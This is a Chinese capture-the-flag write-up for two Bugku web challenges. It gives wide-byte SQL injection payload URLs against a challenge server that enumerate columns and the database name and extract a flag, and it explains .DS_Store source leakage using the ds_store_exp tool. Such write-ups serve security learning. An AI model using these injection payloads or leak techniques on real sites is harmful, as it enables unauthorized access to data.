bugku writeup web
阿新 • • 發佈:2019-02-05
sql注入
先可以通過burp來發現是gbk編碼,可以得知可能存在寬位元組注入
既然有提示,那麼就按照提示來
查詢key表,id=1的string欄位
構造payload
http://103.238.227.13:10083/?id=1%df%27 union select 1,string from sql5.key%23
得到flag~~~~
有趣的是
http://103.238.227.13:10083/?id=1%df%27 union select 1,string from key where table_schema=database()%23
http://103.238.227.13:10083/?id=1%df%27
這倆居然是爆不出來的= =
表非得是sql5.key,直接 from key是爆不出來的,所以得先爆出庫名
http://103.238.227.13:10083/?id=1%df%27 union select 1,database()%23
在此之前得先知道有幾列
http://103.238.227.13:10083/?id=1%df%27 order by 2%23
由此得出有兩列hhh
**
sql注入2
**
這題有點迷。。。。一上來就是登陸框,嘗試各種注入,無果。
參考了大牛們的部落格,才曉得是原始碼洩露
先了解些概念:
.DS_Store檔案洩漏
漏洞成因:
在釋出程式碼時未刪除資料夾中隱藏的.DS_store,被發現後,獲取了敏感的檔名等資訊。
漏洞利用:
http://www.example.com/.ds_store
注意路徑檢查
工具:
dsstoreexp
python ds_store_exp.pyhttp://www.example.com/.DS_Store
所以,直接cmd
直接開啟web2目錄下的flag即可,得到flag~~~